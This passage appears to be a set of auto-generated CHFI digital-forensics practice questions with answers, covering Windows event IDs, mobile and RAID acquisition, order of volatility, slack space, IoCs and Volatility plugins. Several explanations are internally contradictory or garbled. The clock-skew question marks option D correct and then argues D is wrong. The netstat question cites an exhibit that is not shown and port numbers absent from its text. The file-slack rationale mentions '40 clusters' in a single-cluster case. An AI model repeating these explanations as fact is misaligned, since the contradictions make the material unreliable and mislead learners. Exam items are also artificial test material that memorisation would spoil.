The trap here is that candidates often confuse Event ID 7045 with process creation (4688) or logon events (4624), because service installation involves starting a process and may require authentication, but the specific event for the installation itself is uniquely 7045.

How to eliminate wrong answers

Option A is wrong because Event ID 4624 is an account logon success event, not a service installation event. Option C is wrong because Event ID 4688 is a process creation event, triggered when a new process is started, not when a service is installed. Option D is wrong because Event ID 4720 is a user account creation event, which logs when a new user is added to the security principal database, not a service installation.

24
Multi-Selectmedium

A forensic examiner is analyzing an Android device that was factory reset. Which TWO artefacts or methods could the examiner use to potentially recover or identify data from before the reset?

Select 2 answers
A.Performing a logical extraction via ADB
B.Recovering deleted apps via ADB backup
C.Examining the device manually through the UI
D.Analyzing Google account artefacts synced to the cloud
E.Using a physical extraction tool like Cellebrite UFED
AnswersD, E

Analyzing the associated Google account's cloud artefacts is a valid approach because the user's sync history may contain contacts, calendar entries, Chrome browsing data, and app-specific backups that were uploaded prior to the reset. Cloud data is independent of the device's storage, so even though the device is wiped, the forensic examiner can obtain a trove of evidence by accessing the account with proper legal authority. This method does not depend on device configuration or flash-memory recovery, thus providing a reliable and often commercially supported avenue for evidence acquisition.

Why this answer

Option D is correct because data synced to the user's Google account (e.g., Gmail, Contacts, Calendar, Drive, Photos, and Android backups) resides in Google's cloud infrastructure and is not erased by a local factory reset, so the examiner can obtain pre-reset artefacts via the account or legal process. Option E is correct because a physical extraction tool such as Cellebrite UFED reads the underlying flash memory (often via ISP, JTAG, or chip-off) and can recover residual data, including remnants in unallocated space that survive a factory reset if not securely wiped. Option A does not belong because ADB logical extraction only exposes data accessible to the running OS or a debug-enabled device, and a factory reset removes user data and typically disables USB debugging.

Option B does not belong because ADB backup cannot recover deleted apps and requires debugging authorization that a reset device will not grant. Option C does not belong because manual UI examination only shows the post-reset state and cannot surface pre-reset data.

Exam trap

EC-Council often tests the misconception that a factory reset permanently destroys all data, but candidates must recognize that cloud-synced artifacts and physical extraction methods can recover pre-reset data, while logical methods (ADB, UI) are rendered useless by the reset.

25
MCQmedium

A security team suspects a data breach via an external attacker. The incident response plan requires preservation of evidence for legal proceedings. Which order of volatility should the first responder follow?

A.Capture disk image, then memory, then network connections.
B.Record network connections, capture disk image, then memory.
C.Capture memory, record network connections, acquire disk image, then collect backups.
D.Collect backups first, then disk image, then memory.
AnswerC

This is the correct order of volatility: memory first because RAM contains live evidence like decryption keys, running processes, and transient malware that disappears on shutdown; network connections second because they show active command-and-control sessions and can vanish with session teardown; disk image third because persistence preserves it for later analysis; and backups last because they are the least volatile and can be obtained at any time. This sequence maximizes evidence preservation and aligns with RFC 3227 and NIST forensic guidelines, while also supporting a defensible chain of custody.

Why this answer

The order of volatility (OOV) dictates that the most volatile data (memory/registers) must be captured first, followed by network connections, then disk images, and finally backups. This sequence minimizes data loss and ensures evidence integrity for legal proceedings, as volatile data is lost when power is removed.

Exam trap

EC-Council often tests the misconception that disk images are the most critical evidence, leading candidates to prioritize them over volatile memory and network state, which is the exact opposite of the correct order of volatility.

How to eliminate wrong answers

Option A is wrong because it starts with capturing a disk image, which is less volatile than memory and network connections; memory and network state would be lost or altered before the disk is imaged. Option B is wrong because it captures network connections before memory, but memory (RAM) is more volatile and must be acquired first to preserve transient data like running processes and encryption keys. Option D is wrong because it collects backups first, which are the least volatile and can be acquired later; starting with backups risks losing volatile evidence in memory and network connections.

26
MCQeasy

A forensic examiner needs to acquire a hard drive that is part of a RAID 5 array. The RAID controller is unavailable. What is the best approach to acquire the data?

A.Acquire each disk individually, then reconstruct the array using software
B.Acquire only one disk because RAID 5 can be reconstructed from a single disk
C.Use a hardware write blocker that supports RAID
D.Connect the RAID array to a similar controller and acquire as a single drive
AnswerA

Each physical disk must be imaged independently using a proper write blocker to preserve the raw device contents, including RAID metadata, superblocks, and any data sitting outside the array's logical volume. After all disks are imaged, a forensic RAID reconstruction tool (or mdadm with the correct parameters) can reassemble the logical volume by using the known stripe size, parity rotation, and disk order without needing the original controller. This preserves the exact state of the array and avoids the risk of the controller writing configuration changes during acquisition.

Why this answer

When the RAID controller is unavailable, the only reliable method to acquire the data is to image each physical disk individually using a forensic write blocker, then reconstruct the logical RAID 5 volume in a forensic software tool (e.g., FTK Imager, X-Ways Forensics, or EnCase). This preserves the original evidence on each disk and allows the examiner to rebuild the array by specifying the stripe size, parity rotation, and disk order, which is essential because RAID 5 distributes data and parity across all disks and can tolerate a single disk failure.

Exam trap

EC-Council often tests the misconception that a hardware RAID controller is required for forensic acquisition, or that a single disk from a RAID 5 array contains enough data to reconstruct the volume, when in fact individual disk imaging and software reconstruction is the only forensically sound approach when the controller is unavailable.

How to eliminate wrong answers

Option B is wrong because RAID 5 requires at least three disks and uses distributed parity; a single disk contains only stripes and parity blocks, not the complete data, so reconstruction from one disk is impossible. Option C is wrong because a hardware write blocker that supports RAID would still require the RAID controller to present the logical volume; without the controller, the write blocker cannot access the array as a single drive. Option D is wrong because connecting the disks to a similar controller may cause the controller to attempt an automatic rebuild or initialization, altering the evidence, and the controller's configuration (e.g., stripe size, disk order) may not match the original, leading to data corruption or loss.

27
MCQeasy

Which tool is specifically designed for parsing and analyzing email headers to trace the origin of an email and detect spoofing?

A.Wireshark
B.EnCase
C.Nmap
D.EmailTrackerPro
AnswerD

EmailTrackerPro is purpose-built for email header analysis and spoofing detection: it automatically parses the complete RFC 5322 header of a suspicious message, reconstructs the delivery path from Received headers, and pinpoints the originating IP address using WHOIS/GeoIP lookup. It also cross-references the message against SPF, DKIM, and DMARC authentication results to expose forged sender information or unauthorized relaying, which is exactly the specialized functionality required for this task.

Why this answer

EmailTrackerPro is specifically designed to parse email headers, extract routing information, and trace the path an email took from sender to recipient. It analyzes fields like Received, Message-ID, and Authentication-Results to detect spoofing, forging, or relay anomalies, making it the correct tool for this task.

Exam trap

EC-Council CHFI often tests the distinction between network-level tools (Wireshark, Nmap) and application-level forensic tools (EmailTrackerPro), expecting candidates to recognize that email header analysis requires a specialized parser, not a generic packet sniffer.

How to eliminate wrong answers

Option A is wrong because Wireshark is a network packet analyzer that captures live traffic at the packet level, not a tool for parsing stored email headers or tracing email origin. Option B is wrong because EnCase is a forensic imaging and analysis suite for disk and file system forensics, not designed for email header parsing or spoofing detection. Option C is wrong because Nmap is a network scanning tool used for port discovery and service enumeration, not for analyzing email headers or tracing email routes.

28
MCQeasy

During a mobile forensic investigation of an iPhone, an examiner needs to recover deleted SMS messages. Which acquisition method provides the highest likelihood of retrieving deleted data from the device's flash memory?

A.Manual acquisition by taking screenshots
B.File system acquisition via iOS file system extraction
C.Physical acquisition via JTAG or chip-off
D.Logical acquisition via iTunes backup
AnswerC

Physical acquisition via JTAG (Joint Test Action Group) or chip-off directly images the device's raw NAND flash memory, providing a complete bit-for-bit copy of all storage—including allocated, unallocated, and deleted areas. This level of extraction bypasses the operating system's file abstraction layers and allows forensic tools to reconstruct files, including deleted messages, from raw data remnants. JTAG requires hardware-level connections to the device's test ports, while chip-off involves desoldering the memory chip, both yielding the most comprehensive evidence.

Why this answer

Physical acquisition via JTAG or chip-off provides the highest likelihood of recovering deleted SMS messages because it accesses the raw NAND flash memory at the hardware level, bypassing the iOS file system and logical abstractions. Deleted data on flash storage remains in unallocated blocks until overwritten, and physical imaging captures these remnants, including deleted SQLite records from the SMS database. In contrast, logical and file system methods only retrieve active files, missing the unallocated space where deleted messages reside.

Exam trap

EC-Council often tests the misconception that file system acquisition (Option B) can recover deleted data because it extracts the entire file system, but in iOS, the file system extraction does not include unallocated space due to the HFSX/APFS design and sandboxing, making physical acquisition the only method that accesses raw NAND for deleted SMS recovery.

How to eliminate wrong answers

Option A is wrong because manual acquisition via screenshots only captures visible, on-screen content and cannot access deleted data stored in unallocated flash memory. Option B is wrong because file system acquisition via iOS file system extraction retrieves only active files and metadata, not the raw NAND blocks containing deleted SMS records that have been marked as free but not yet overwritten. Option D is wrong because logical acquisition via iTunes backup only extracts files that are part of the backup manifest, which excludes deleted data that has been removed from the SQLite WAL or journal files and is not present in the backup snapshot.

29
MCQmedium

During a forensic investigation, an analyst uses a hardware write blocker to connect a suspect hard drive to a forensic workstation. What is the primary purpose of using a hardware write blocker?

A.To prevent the operating system from writing to the source drive
B.To speed up the data transfer rate during imaging
C.To compress the forensic image to save storage space
D.To automatically hash the drive contents for integrity verification
AnswerA

A hardware write blocker is an inline forensic bridge that sits between the source drive and the host system, filtering every ATA/SCSI command. It permits read requests to reach the drive while silently discarding or blocking write commands, so the operating system cannot modify file metadata, timestamps, directory entries, or any other data. This read-only enforcement at the physical interface level is the fundamental legal and technical guarantee of evidence preservation during acquisition.

Why this answer

A hardware write blocker physically intercepts the write commands from the forensic workstation to the suspect drive, ensuring that no data can be altered on the source drive during acquisition. This preserves the evidentiary integrity of the original media, which is a foundational requirement in digital forensics to maintain a chain of custody and admissibility in court.

Exam trap

The trap here is that candidates often confuse the purpose of a write blocker with other forensic tools or features, such as hashing or compression, which are separate software functions, not hardware-level protections.

How to eliminate wrong answers

Option B is wrong because hardware write blockers do not speed up data transfer rates; they may even introduce a slight latency due to the bridge circuitry. Option C is wrong because compression of the forensic image is a software feature (e.g., EnCase or FTK Imager options), not a function of a hardware write blocker. Option D is wrong because hashing for integrity verification is performed by imaging software (e.g., using MD5 or SHA-1) after acquisition, not by the hardware write blocker itself.

30
MCQmedium

A first responder arrives at a suspected data breach scene. The system is powered on and a user is logged in. Which of the following actions should the responder take FIRST to preserve volatile data?

A.Document the scene and take photographs, then proceed to interview witnesses.
B.Immediately disconnect the network cable and power off the computer.
C.Collect volatile data such as RAM, network connections, and running processes using appropriate tools.
D.Use a hardware write-blocker to create a forensic image of the hard drive.
AnswerC

This is the correct first step because the order of volatility dictates that data stored in memory and system state is the most short-lived and must be captured before any other activity. Using forensic tools such as a memory acquisition utility (e.g., DumpIt, win32dd, or LiME), netstat for active connections, and ps/tasklist for running processes preserves the live view of the incident. This collection must be performed on the running system, and all tool binaries should be loaded from a trusted read-only medium to avoid altering the very evidence being gathered.

Why this answer

Volatile data (RAM, network connections, running processes) is lost when power is removed. The first responder must capture this data using tools like FTK Imager, WinPmem, or netstat before any shutdown or disconnection. This aligns with the order of volatility (RFC 3227), which prioritizes memory and network state over disk imaging.

Exam trap

The EC-Council CHFI exam often tests the misconception that immediate power-off or network disconnection is the safest first step, but the trap is that this destroys volatile data critical for proving the attack timeline and identifying the attacker's tools.

How to eliminate wrong answers

Option A is wrong because documentation and witness interviews, while important, do not preserve volatile data that will be lost if the system is powered down or the network state changes. Option B is wrong because immediately disconnecting the network cable and powering off the computer destroys volatile data (RAM, network connections, running processes) and may also trigger anti-forensic mechanisms or encryption key loss. Option D is wrong because using a hardware write-blocker to image the hard drive is a non-volatile data acquisition step that should occur after volatile data collection, not first.

31
Multi-Selecthard

During dynamic analysis of a malware sample in a sandbox, an analyst observes the following behaviours: (1) A file is created at C:\Windows\System32\drivers\etc\hosts, (2) A registry key is set at HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateSvc, (3) Outbound TCP connections to 198.51.100.10 on port 8080. Which THREE of the following IoCs are MOST relevant to share with the threat intelligence team?

Select 3 answers
A.MD5 hash of the original malware file
B.Network connection to 198.51.100.10:8080
C.Registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateSvc
D.Mutex name created by the malware
E.File path C:\Windows\System32\drivers\etc\hosts
AnswersB, C, E

This is a network-based IoC indicating C2.

Why this answer

The outbound TCP connection to 198.51.100.10 on port 8080 is a direct network-based indicator of compromise (IoC) that threat intelligence teams can use to block or monitor malicious C2 traffic. This IP and port combination represents a specific command-and-control endpoint, making it highly actionable for network defense and threat hunting.

Exam trap

EC-Council often tests the distinction between observed behaviors (file creation, registry modification, network connections) and derived IoCs (hashes, mutexes), tricking candidates into selecting all listed options rather than only those directly tied to the observed actions.

32
Multi-Selecteasy

Which THREE of the following are common indicators of compromise (IoCs) that can be used to detect malware infections?

Select 3 answers
A.The user's favorite color
B.The brand of the victim's computer
C.Registry key created by malware for persistence
D.MD5 or SHA-256 hash of the malware file
E.IP address of the command and control server
AnswersC, D, E

Malware often writes or modifies registry keys such as HKCU\Software\Microsoft\Windows\CurrentVersion\Run to achieve persistence across reboots. This registry modification is a concrete host-based indicator of compromise, because it represents an unauthorized change to the system by the attacker. Security analysts can correlate the key path and subkeys with known malware names or command-line parameters to confirm an infection and determine where to mount a defense.

Why this answer

Option C is correct because malware frequently establishes persistence by creating or modifying registry keys (for example, under HKCU\Software\Microsoft\Windows\CurrentVersion\Run or as a service entry), and such unauthorized registry changes are a classic host-based IoC. Option D is correct because cryptographic file hashes such as MD5 or SHA-256 uniquely identify known malicious files, allowing defenders to scan endpoints and compare against threat-intelligence hash feeds. Option E is correct because the IP address of a command-and-control (C2) server is a network-based IoC that can be blocked at the firewall or detected in proxy, DNS, and NetFlow logs to reveal infected hosts beaconing out.

Options A and B are not IoCs: a user's favorite color and the brand of a victim's computer are irrelevant personal or hardware attributes that provide no technical evidence of malware activity.

Exam trap

EC-Council often tests the distinction between user-specific or hardware-specific attributes (like favorite color or computer brand) and actual system-level artifacts that indicate compromise, leading candidates to mistakenly include irrelevant options if they do not focus on technical IoCs.

33
Multi-Selectmedium

Which THREE of the following are techniques used to hide data on a hard drive?

Select 3 answers
A.File carving
B.Host Protected Area (HPA)
C.Slack space
D.Alternate Data Streams
E.Hashing
AnswersB, C, D

Host Protected Area (HPA) is a reserved region on ATA/ATAPI hard drives that is defined by the SET MAX ADDRESS command, making it invisible to the operating system and standard disk utilities. Data stored in HPA lies beyond the reported maximum address, so it escapes normal filesystem enumeration and can only be accessed using special ATA commands such as IDENTIFY DEVICE or READ NATIVE MAX ADDRESS. Forensic examiners must consciously probe for HPA during imaging, as it is a common hiding location for covert data.

Why this answer

Host Protected Area (HPA) is correct because it is a hidden region of the disk, outside the normal addressable sectors reported to the OS, that can be used to conceal data from standard file system tools. Slack space is correct because the unused bytes between the logical end of a file and the end of its allocated cluster can store hidden data without changing the file's apparent size. Alternate Data Streams (ADS) is correct because NTFS allows multiple data streams to be attached to a single file, and these streams are not shown by ordinary directory listings, making them a common hiding technique.

File carving is not a hiding technique but a forensic recovery method for reconstructing files from raw disk data, and hashing is an integrity-verification technique that produces a fixed-length digest and does not conceal data.

Exam trap

The CHFI exam often tests the distinction between data hiding techniques (like HPA, slack space, and ADS) and data recovery or integrity techniques (like file carving and hashing), so candidates mistakenly select file carving or hashing because they associate them with forensic analysis rather than recognizing they do not hide data.

34
MCQeasy

In network forensics, which tool is specifically designed for packet capture and analysis, allowing examiners to inspect individual packets and reconstruct network conversations?

A.Tcpdump
B.Netstat
C.Nmap
D.Wireshark
AnswerD

Wireshark is a full-featured network protocol analyzer that captures live traffic from network interfaces and also reads saved pcap/pcapng files. Its interactive GUI lets investigators drill down through every protocol layer, reassemble TCP streams, decode hundreds of application protocols, follow HTTP/email/file transfers, and apply display filters or statistical summaries to isolate evidence. Wireshark's deep packet inspection, packet-bytes view, and exportable payload capabilities make it the standard go-to tool for network forensics.

Why this answer

Wireshark is the correct answer because it is a full-featured packet analyzer that captures live network traffic and provides deep inspection of hundreds of protocols. It allows examiners to filter packets, follow TCP streams, and reconstruct entire network conversations, making it the standard tool for network forensics analysis.

Exam trap

The EC-CHFI exam often tests the distinction between packet capture tools (Tcpdump, Wireshark) and network diagnostic/scanning tools (Netstat, Nmap), leading candidates to confuse Tcpdump's capture capability with Wireshark's advanced analysis and reconstruction features.

How to eliminate wrong answers

Option A is wrong because Tcpdump is a command-line packet capture tool that can capture packets but lacks the graphical interface and advanced analysis features (e.g., protocol dissection, stream reassembly) needed for in-depth forensic inspection. Option B is wrong because Netstat displays network connections, routing tables, and interface statistics, but it does not capture or analyze individual packets. Option C is wrong because Nmap is a network scanning and discovery tool used for port scanning and service enumeration, not for packet capture or conversation reconstruction.

35
MCQhard

During a forensic investigation, you find a prefetch file created at 03:15:22 UTC on the system. The corresponding executable's last modified timestamp is 02:30:00 UTC, and the system date/time shows a discrepancy of +5 minutes. What is the MOST accurate interpretation regarding the file execution time?

A.The program was executed at 02:30:00 UTC.
B.The program was executed at 03:15:22 UTC.
C.Execution time cannot be determined from prefetch files alone.
D.The program was executed at 03:10:22 UTC after adjusting for clock skew.
AnswerD

The prefetch file was created at system time 03:15:22, but the system clock is +5 minutes fast, so the actual UTC time is 03:10:22. This option correctly adjusts for clock skew and is the most accurate interpretation.

Why this answer

The prefetch file creation timestamp records the system time at execution. The system clock is +5 minutes ahead, so actual UTC at execution is 03:10:22 (03:15:22 minus 5 minutes). Option D correctly adjusts for this clock skew.

Option B is wrong because it ignores the clock discrepancy, which is a known issue in forensic analysis.

Exam trap

The CHFI exam often tests the misconception that the executable's last modified timestamp or the prefetch file's internal 'last run time' is the primary indicator of execution time, when in fact the prefetch file's creation timestamp is the key for first execution.

How to eliminate wrong answers

Option A is wrong because the executable's last modified timestamp indicates when the file was last changed on disk, not when it was executed; execution time is derived from the prefetch file's creation timestamp, not the executable's metadata. Option C is wrong because prefetch files do provide a reliable indicator of first execution time via their creation timestamp, though subsequent executions update the 'last run time' within the file. Option D is wrong because adjusting for clock skew would require subtracting the +5-minute discrepancy from the prefetch timestamp (03:15:22 - 0:05 = 03:10:22) only if the prefetch timestamp were in true UTC, but the prefetch timestamp is recorded in system local time (which already includes the +5-minute offset), so no adjustment is needed; the system's reported UTC is already skewed.

36
MCQeasy

Refer to the exhibit. A first responder runs the netstat command on a compromised Windows workstation. Which of the following conclusions is BEST supported by the output?

A.The connection to 192.168.1.1:80 is suspicious because it is in TIME_WAIT state.
B.The UDP listener on port 5353 indicates a malware infection.
C.A process with PID 1234 is likely communicating with a remote C2 server at 10.2.3.4.
D.The workstation is running multiple virtual machines based on the local addresses.
AnswerC

PID 1234 holding two established TCP connections to the same remote IP address 10.2.3.4 on different ephemeral source ports is a notable pattern. Established connections indicate active communication, and multiple simultaneous connections to a single remote host—especially if that host is not a known internal server—can represent command-and-control (C2) beaconing or data exfiltration, particularly when the process is unfamiliar or unauthorized. This observation warrants further investigation into the process, its binary, and the remote address's reputation.

Why this answer

An established TCP connection (ESTABLISHED state) from the workstation to a remote IP on a high ephemeral port (49152) with PID 1234 strongly indicates active communication. This is a classic indicator of a beaconing C2 channel, as legitimate outbound connections typically use well-known ports or are short-lived. The netstat output shows PID 1234 has a persistent connection to 10.2.3.4:4444, which is a common port for malware command and control.

Exam trap

EC-Council often tests the misconception that TIME_WAIT or UDP listeners are inherently malicious, when in fact they are normal TCP/IP behaviors; the trap here is to recognize that ESTABLISHED connections to unusual ports with a specific PID are the strongest indicator of active C2 communication.

How to eliminate wrong answers

Option A is wrong because TIME_WAIT state is normal for TCP connections that have been closed; it is not inherently suspicious and is expected after a client finishes an HTTP request to 192.168.1.1:80. Option B is wrong because UDP port 5353 is used by mDNS (RFC 6762) for local network service discovery, a legitimate Windows service, and is not a reliable indicator of malware. Option D is wrong because local addresses like 127.0.0.1 and 0.0.0.0 are loopback and wildcard addresses, not evidence of virtual machines; virtual machines typically have distinct IP addresses on separate virtual network adapters.

37
Multi-Selecteasy

Which two of the following are tools used for memory forensics acquisition? (Choose TWO.)

Select 2 answers
A.Autopsy
B.FTK Imager
C.WinPmem
D.Volatility
E.LiME
AnswersC, E

WinPmem is a dedicated memory acquisition tool for Windows that loads a kernel-mode driver to map and copy physical memory (RAM) into a raw image or an AFF4 container. Developed by the Rekall project and now maintained as part of the pmem suite, it is specifically engineered to produce a faithful snapshot of volatile memory for later analysis with Volatility or Rekall. Therefore, it is correct as a memory forensic acquisition utility.

Why this answer

WinPmem (C) is a memory acquisition tool that captures physical memory from live Windows systems into a raw image file, making it a correct choice for memory forensics acquisition. LiME (E) is a Loadable Kernel Module for Linux that acquires volatile memory to a file or over the network, and it is specifically designed for memory acquisition, so it is also correct. Autopsy (A) is a graphical digital forensics platform used primarily for disk image analysis and file system examination, not memory acquisition.

FTK Imager (B) is used for creating forensic disk images and mounting images, not for capturing RAM. Volatility (D) is a memory analysis framework that parses memory images after acquisition, so it is not an acquisition tool.

Exam trap

EC-Council often tests the distinction between memory acquisition tools (which capture RAM) and memory analysis tools (which examine captured dumps), so candidates may mistakenly choose Volatility (a popular analysis tool) as an acquisition tool.

38
MCQmedium

During a forensic acquisition, you notice that the target drive has bad sectors. What is the best approach to acquire the drive?

A.Use dd with a higher block size to skip bad sectors
B.Use ddrescue to recover as much data as possible
C.Use FTK Imager and ignore the errors
D.Perform a physical acquisition by removing platters
AnswerB

ddrescue is purpose-built for imaging failing or damaged storage devices. It reads the drive in a single pass, records errors in a logfile, and then retries difficult sectors with increasingly fine-grained reads, recovering the maximum amount of data while preserving a documented map of the damage. Because it can be re-run and continues from the logfile, it is the forensically sound choice when the target drive exhibits read errors.

Why this answer

B is correct because ddrescue is specifically designed to handle media with bad sectors by using a sophisticated read-retry algorithm that logs errors and attempts recovery from multiple angles, including reverse reads and splitting the drive into good and bad regions. Unlike dd, which will abort or produce corrupted output on encountering a bad sector, ddrescue maximizes data recovery while preserving a map of unrecoverable areas.

Exam trap

EC-Council often tests the misconception that dd can handle bad sectors by adjusting block size, but the trap is that dd lacks any error recovery algorithm and will simply fail or produce incomplete data, whereas ddrescue is the proper tool for forensic acquisition of damaged media.

How to eliminate wrong answers

Option A is wrong because increasing the block size in dd does not skip bad sectors; it only changes the read granularity, and a bad sector within a larger block will still cause an I/O error, potentially aborting the entire acquisition. Option C is wrong because FTK Imager, while capable of ignoring read errors, does not actively attempt to recover data from bad sectors; it simply skips them and logs the error, resulting in data loss without the advanced retry and mapping capabilities of ddrescue. Option D is wrong because physically removing platters is an extreme, destructive method reserved for drives with severe mechanical failure or when the drive cannot be powered on; it is not the best approach for a drive with only bad sectors, as it risks total data loss and is unnecessary when software tools like ddrescue can recover most data.

39
MCQeasy

During a forensic analysis of a Windows 10 system, an investigator needs to locate the Master File Table ($MFT) to analyze file metadata. Which file system structure contains the $MFT?

A.ext4 superblock
B.FAT32's File Allocation Table
C.HFS+ catalog file
D.NTFS volume's Master File Table
AnswerD

The $MFT is the Master File Table, the core structure of the NTFS filesystem, and it holds 1024-byte file records for every file and directory, including system metadata files. Each record contains attributes such as $STANDARD_INFORMATION (timestamps, flags), $FILE_NAME, and $DATA, which investigators parse to enumerate files, examine MAC times, and uncover deleted entries. Since Windows 10 defaults to NTFS, this is the structure an investigator should analyze to retrieve file metadata.

Why this answer

The $MFT is a core component of the NTFS file system, storing metadata for every file and directory on the volume. It is located in the NTFS volume's designated Master File Table area, not in any other file system structure. Option D correctly identifies this NTFS-specific structure.

Exam trap

The trap here is that candidates may confuse the $MFT with other file system structures like the FAT (which tracks cluster chains) or assume it is a generic concept across all file systems, but EC-Council tests that the $MFT is exclusive to NTFS and is the primary source for file metadata in Windows forensics.

How to eliminate wrong answers

Option A is wrong because the ext4 superblock is a metadata structure for the Linux ext4 file system, not for Windows NTFS. Option B is wrong because FAT32's File Allocation Table tracks cluster allocation for files, not file metadata like timestamps or security descriptors. Option C is wrong because the HFS+ catalog file is part of Apple's HFS+ file system, used on macOS, and does not exist on Windows NTFS volumes.

40
MCQmedium

In iOS forensics, which database file typically contains the call history, including incoming, outgoing, and missed calls?

A.Notes.db
B.call_history.db
C.AddressBook.db
D.SMS.db
AnswerB

call_history.db, typically under /private/var/mobile/Library/CallHistoryDB/, is the system SQLite database populated by the telephony daemon for all incoming, outgoing, and missed calls. It preserves fields such as the peer phone number, call date, duration, call status, and unique identifiers. In iOS forensics, this is the authoritative source for call records.

Why this answer

In iOS forensics, the call history (incoming, outgoing, and missed calls) is stored in the SQLite database file named `call_history.db`. This database is located within the root domain of the iOS file system (typically under `/private/var/mobile/Library/CallHistoryDB/`) and contains tables such as `call` and `call_history` that record each call's direction, duration, timestamp, and associated contact identifier. The CHFI exam specifically tests this file as the authoritative source for call log evidence.

Exam trap

EC-Council often tests the misconception that `AddressBook.db` or `SMS.db` might contain call logs because they store contact names and message threads, but the trap is that call history is stored in a separate, dedicated database (`call_history.db`) that is not linked to the address book or SMS databases.

How to eliminate wrong answers

Option A is wrong because `Notes.db` stores user notes and not call history; it is located in the `/private/var/mobile/Library/Notes/` directory and contains tables like `ZNOTE` and `ZNOTEBODY`. Option C is wrong because `AddressBook.db` (now `Contacts.db` in newer iOS versions) stores contact information (names, phone numbers, email addresses) but does not contain call log records; it is used for address book data, not call history. Option D is wrong because `SMS.db` stores SMS and iMessage conversations, including text messages and attachments, but not call history; it is found in `/private/var/mobile/Library/SMS/` and contains tables like `message` and `chat`.

41
MCQmedium

An analyst notices that a file on an NTFS volume occupies 4096 bytes on disk but its actual data is only 100 bytes. The extra space contains remnants of a previously deleted file. What is this extra space called?

A.Volume slack
B.Free space
C.RAM slack
D.File slack
AnswerD

File slack is the unused area within the last allocated cluster of a file, spanning from the bytes beyond the logical end of the file to the physical end of that cluster, and it is composed of both RAM slack and the remaining sector space. On NTFS, these bytes are not zeroed when a file is written, so they may contain residual data from previously deleted files or older versions of the current file, making them a valuable forensic source. This exactly matches the analyst's observation of a file occupying 40 clusters where some space is unused, because that space remains attributed to the file's allocated cluster rather than to free or volume slack.

Why this answer

File slack is the unused space between the end of the actual file data and the end of the last allocated cluster for that file. On an NTFS volume with a 4096-byte cluster size, a 100-byte file leaves 3996 bytes of slack space, which may contain remnants of previously deleted files. This is why option D is correct.

Exam trap

The trap here is that candidates confuse file slack with volume slack or free space, not realizing that file slack is specifically the unused portion within a file's allocated cluster(s) that can still hold residual data from prior file writes.

How to eliminate wrong answers

Option A is wrong because volume slack refers to the unused space at the end of a volume (partition) after the last cluster, not within a file's allocated clusters. Option B is wrong because free space is unallocated disk space not assigned to any file, whereas the extra space described is allocated to the file but unused. Option C is wrong because RAM slack is the space between the end of the file data and the end of the sector (typically 512 bytes), not the full cluster slack; RAM slack is a subset of file slack that exists only in the last sector of a file.

42
Multi-Selecthard

An analyst is conducting memory forensics on a Windows system using Volatility. Which THREE commands can provide information about network connections?

Select 3 answers
A.netscan
B.pstree
C.connscan
D.sockets
E.pslist
AnswersA, C, D

netscan is correct because it performs pool tag scanning to recover TCP and UDP endpoint objects from non-paged kernel memory, reliably identifying both listening and established connections on modern Windows versions. This plugin is specifically designed for network artifact extraction in memory forensics and provides complete connection tuples including local/remote IP and port, satisfying the analyst's need.

Why this answer

Option A, netscan, is correct because it scans for network artifacts such as TCP endpoints, listening sockets, and UDP connections across all memory pools, making it the modern Volatility plugin for network connection discovery. Option C, connscan, is correct because it scans physical memory for TCP connection objects (pool tag TcpE), revealing local and remote IP addresses and ports for established connections. Option D, sockets, is correct because it enumerates socket objects in memory, showing socket handles, protocols, and associated connection details.

Option B, pstree, is not correct because it displays parent-child process relationships, not network connections. Option E, pslist, is not correct because it lists active processes from the process list, which contains no network connection information.

Exam trap

The CHFI exam often tests the distinction between commands that list network connections (netscan, connscan, sockets) versus those that list processes (pslist, pstree), trapping candidates who confuse process enumeration with network artifact retrieval.

43
MCQhard

An analyst is examining a RAID 5 array of three disks. One disk has failed and been replaced; the array is rebuilding. Which of the following is the most significant forensic challenge regarding data acquisition from this array?

A.The failed disk cannot be imaged because it is physically damaged
B.The rebuild process may overwrite unallocated space or remnants of deleted files
C.RAID 5 arrays cannot be imaged using traditional tools like dd
D.The array must be imaged while degraded to preserve evidence
AnswerB

In RAID 5, when a disk is missing, the controller regenerates the lost data on the fly from parity on the remaining disks and writes the complete reconstructed dataset to a new disk. This rebuild operation writes across every block of the replacement disk and often touches unallocated space and slack on the other members as the array re-stripes or normalizes, potentially overwriting remnants of deleted files that could be critical evidence. Even if a physical copy of the failed disk is impossible, the evidence on the surviving disks is vulnerable to destruction by the rebuild write process. Therefore, the correct forensic action is to image all member disks first.

Why this answer

During a RAID 5 rebuild, the array controller reads parity and data from the remaining healthy disks to reconstruct the missing data onto the replacement disk. This process writes to the entire replacement disk, including areas that previously held unallocated space or remnants of deleted files, potentially overwriting critical forensic evidence. The rebuild is a low-level write operation that does not respect file system boundaries, making it a significant challenge for data acquisition.

Exam trap

EC-Council often tests the misconception that a failed disk is always unrecoverable (Option A) or that RAID arrays cannot be imaged with standard tools (Option C), while the real forensic challenge is the destructive nature of the rebuild process itself.

How to eliminate wrong answers

Option A is wrong because a failed disk can often be imaged using specialized hardware or techniques (e.g., PC-3000, chip-off recovery) even if physically damaged, and the question does not specify that the disk is physically damaged beyond recovery. Option C is wrong because RAID 5 arrays can be imaged using traditional tools like dd if the array is presented as a logical volume by the controller or by using software RAID (e.g., mdadm) to assemble the array; dd works on block devices regardless of RAID level. Option D is wrong because imaging an array while degraded (with a missing disk) is possible and may be necessary to avoid rebuild overwrites, but the question asks for the most significant forensic challenge, which is the active rebuild process overwriting data, not the degraded state itself.

44
Multi-Selectmedium

Which TWO of the following are essential steps that a first responder should take when arriving at a digital crime scene? (Select TWO)

Select 2 answers
A.Capture volatile data from running systems
B.Immediately start the forensic imaging process
C.Install forensic software on the suspect's computer
D.Interview all witnesses without documentation
E.Photograph and document the scene
AnswersA, E

Volatile data resides only in memory and other transient system states that vanish when the system loses power; capturing it first is imperative. As a first responder, collect RAM contents, active network connections, and running processes before powering down, using trusted forensic utilities from external media. This preserves ephemeral evidence such as encryption keys, attacker command lines, and in-memory malware that would otherwise be permanently lost.

Why this answer

Option A is correct because volatile data such as RAM contents, running processes, network connections, and open files will be lost on shutdown or reboot, so a first responder must capture it using tools like memory dumps or live-response utilities before powering down the system. Option E is correct because photographing and documenting the scene preserves the original state and chain of custody, recording the physical layout, cable connections, and system status before any evidence is altered. Option B is not an essential first-responder step because forensic imaging is typically performed later by a forensic examiner after volatile data is secured and the scene is documented, and imaging a running system prematurely can destroy volatile evidence.

